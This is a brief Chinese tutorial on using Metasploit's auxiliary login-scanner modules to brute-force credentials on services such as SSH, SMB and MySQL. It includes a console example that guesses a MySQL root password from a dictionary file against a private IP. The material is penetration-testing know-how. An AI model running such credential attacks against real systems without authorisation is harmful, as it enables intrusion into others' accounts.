目录

工具介绍

常用模块

参数介绍

工具使用

---

工具介绍

Metasploit框架(Metasploit Framework, MSF)是一个开源工具， 旨在方便渗透测试，它是由Ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发、使用定制的工具模板。

常用模块

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/smb/smb_login auxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/vnc/vnc_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/snmp/snmp_login

参数介绍

RHOSTS 攻击的目标
PASS_FILE 密码字典
STOP_ON_SUCCESS 成功破解一个终止
THREADS 线程数
set 设置参数

示例

	msfconsole
	msf5 > use auxiliary/scanner/mysql/mysql_login
	msf5 auxiliary(mysql_login) > set PASS_FILE /root/xhydra/pass.txt
	msf5 auxiliary(mysql_login) > set USERNAME root
	msf5 auxiliary(mysql_login) > set RHOSTS 192.168.10.134
	msf5 auxiliary(mysql_login) > run
	# set 设置
	# show options 查询设置
	# back 返回
	# info 查询模块的信息
	# exploit/run 运行模块

工具使用

启动

msfconsole

搜索 

search mssql_login

使用

 search smb_login

use auxiliary/scanner/smb/smb_login

show options

配置选项

run